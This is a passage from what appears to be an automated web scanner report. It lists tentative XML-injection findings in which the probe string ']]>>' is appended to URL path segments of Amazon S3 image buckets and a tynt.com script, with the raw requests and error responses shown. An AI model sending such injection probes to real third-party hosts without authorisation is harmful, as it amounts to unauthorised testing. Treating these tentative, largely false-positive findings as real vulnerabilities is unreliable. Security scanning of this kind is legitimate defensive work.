The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg]]>>?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: D7093B07B0F2B667
x-amz-id-2: wPFPLydDHKAzaG/GnfaPbXlNYJIs3ALIBRh0QSebHGWpQNrJUQmmIQHb+M+14o4f
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:24 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D7093B07B0F2B667</RequestId><HostId>wPFPLydDHKAzaG/GnfaPbXlNYJIs3ALIBRh0QSebHGWpQNrJUQ
...[SNIP]...

8.41. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17660/AP110429160259.jpg?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: A014D6BAD04CBBAF
x-amz-id-2: D/CYufhjkKsTnMteLpcVsw1/FlIRMIzo6PzDtuY+sKfNbfjTa+2hGHF07JRJ69QP
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:10 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>A014D6BAD
...[SNIP]...

8.42. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17660/AP110429160259.jpg?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: AE84370B8E34005F
x-amz-id-2: MBgrrUzcbkebBpKUCPjGvRC2c1IrOUpshJvgzClQpHyIJCOTh17CXRqQ/da0T1bJ
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AE84370B8E34005F</RequestId><HostId>MBgrrUzcbkebBpKUCPjGvRC2c1IrOUpshJvgzClQpHyIJCOTh1
...[SNIP]...

8.43. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17660]]>>/AP110429160259.jpg?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: EB05BE6220311CE2
x-amz-id-2: l1Ur6kFB5IDYQ4utheDQ1ooawbATy62d3NEt0xjmGPl3+Dle6B+YY/eV6cIQBAe/
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EB05BE6220311CE2</RequestId><HostId>l1Ur6kFB5IDYQ4utheDQ1ooawbATy62d3NEt0xjmGPl3+Dle6B
...[SNIP]...

8.44. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg]]>>?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: AFB02C276AF74B58
x-amz-id-2: hrDGigOFKHMo+AViazAO8kPOJgITbJ8YYx2DeHKtp6oC2298aDWSD/gvJXSo+G2+
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:17 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AFB02C276AF74B58</RequestId><HostId>hrDGigOFKHMo+AViazAO8kPOJgITbJ8YYx2DeHKtp6oC2298aD
...[SNIP]...

8.45. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17661/AP11050105364.jpg?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 89D4D42895CDB5B7
x-amz-id-2: qrtgZ0rfX4uCSRClaqcutwZKQExxw6kCUi/00RC0oRyuJpd9mm5wEORNwTvZFQQt
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:09 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>89D4D4289
...[SNIP]...

8.46. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17661/AP11050105364.jpg?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 4CB01F845ECE70E3
x-amz-id-2: a3+ztgmqZnVE7ebfUULnk+kl5FeTlfDTpVB5n4mFDdOLTIkeZcQvcOJGM+Ire6pY
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CB01F845ECE70E3</RequestId><HostId>a3+ztgmqZnVE7ebfUULnk+kl5FeTlfDTpVB5n4mFDdOLTIkeZc
...[SNIP]...

8.47. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17661]]>>/AP11050105364.jpg?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: EE42AD55490EB5B4
x-amz-id-2: /7Jq5JDokx6p3t4BpTo4qI4qN3fPDsLKXZxzJuyxskIhtaSrTyUUCsmM5eZ62cS1
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE42AD55490EB5B4</RequestId><HostId>/7Jq5JDokx6p3t4BpTo4qI4qN3fPDsLKXZxzJuyxskIhtaSrTy
...[SNIP]...

8.48. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg]]>>?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: CC592AEA8352786D
x-amz-id-2: nFqe66XBjQ10L3fZwT1KcIf+1THxsnJo/1+Da13ClPQg0kfW48gxw2crVv1uhJxt
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:15 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CC592AEA8352786D</RequestId><HostId>nFqe66XBjQ10L3fZwT1KcIf+1THxsnJo/1+Da13ClPQg0kfW48
...[SNIP]...

8.49. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17665/AP110514120499.jpg?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: C7741386D4BE1B82
x-amz-id-2: f8dZyKIh4mi8zxPOp6DxkP9VUPEMME9lRzVXOk9EnYaf4saf4L6N7Oa8wQ5Gl/oj
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:08 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>C7741386D
...[SNIP]...

8.50. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17665/AP110514120499.jpg?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1608602CA911B023
x-amz-id-2: APWsURpKnFDCnk3D1wzZaZos3WTexy4qbWUgJl7WUazBsu5y/Ofri7xWxF+DnYWE
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:10 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1608602CA911B023</RequestId><HostId>APWsURpKnFDCnk3D1wzZaZos3WTexy4qbWUgJl7WUazBsu5y/O
...[SNIP]...

8.51. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17665]]>>/AP110514120499.jpg?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 238C40A298BAF1B2
x-amz-id-2: KSTh9o2Hi0yX7ZrEElh25Qx2IqDB7sTPIr+S8NHmVJtbCYzyAuiH8n7AzmV3MkV5
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:11 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>238C40A298BAF1B2</RequestId><HostId>KSTh9o2Hi0yX7ZrEElh25Qx2IqDB7sTPIr+S8NHmVJtbCYzyAu
...[SNIP]...

8.52. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg]]>>?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: BE53E5BFF6C5DD45
x-amz-id-2: RpNbCEi15NVZj+XP05N6nXzBKmAOJUHEL5er1BAkCjMgnB/aHI5ddjJn12+IWzfT
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BE53E5BFF6C5DD45</RequestId><HostId>RpNbCEi15NVZj+XP05N6nXzBKmAOJUHEL5er1BAkCjMgnB/aHI
...[SNIP]...

8.53. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17680/AP_posada.jpg?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 061F07AA51AE5B45
x-amz-id-2: BgifvUsj8gbWtiV6YslMbq1DjvmC225a2u+dG+KiDYXJA2XoK731ctcReNIc5KpF
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>061F07AA5
...[SNIP]...

8.54. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17680/AP_posada.jpg?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 0C5AFFFEC52D5EAD
x-amz-id-2: H5iivuAiX31/RJhiw1VSD6OkyTJuux4bAQ4Ro/CEhw68NWq/FvAWnvK134CdRlcx
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:15 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0C5AFFFEC52D5EAD</RequestId><HostId>H5iivuAiX31/RJhiw1VSD6OkyTJuux4bAQ4Ro/CEhw68NWq/Fv
...[SNIP]...

8.55. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17680]]>>/AP_posada.jpg?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 02143E619715AB5F
x-amz-id-2: aEpILhy6wy1S5eg3kAciyB9Bqlu2WMdvbl3+5tkX2OaBv+hIcJLyHyGYjuLLK/I5
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:15 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>02143E619715AB5F</RequestId><HostId>aEpILhy6wy1S5eg3kAciyB9Bqlu2WMdvbl3+5tkX2OaBv+hIcJ
...[SNIP]...

8.56. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg]]>>?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: E6A7BD1FFBA22478
x-amz-id-2: h6EEI7o05c+HPpfFe6cfeXCdcgVnIL3dV9/rakUXQZL0FIOJbBt6F/FMfyaXS2L/
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E6A7BD1FFBA22478</RequestId><HostId>h6EEI7o05c+HPpfFe6cfeXCdcgVnIL3dV9/rakUXQZL0FIOJbB
...[SNIP]...

8.57. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/Tracer.js?user=aH4rgeyDqr35CXadbi-bpO HTTP/1.1
Host: tcr.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=1800
Content-Type: text/html
Date: Sun, 15 May 2011 20:02:29 GMT
Expires: Sun, 15 May 2011 20:32:29 GMT
Server: EOS (lax001/54F8)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.58. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts/Tracer.js]]>>?user=aH4rgeyDqr35CXadbi-bpO HTTP/1.1
Host: tcr.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
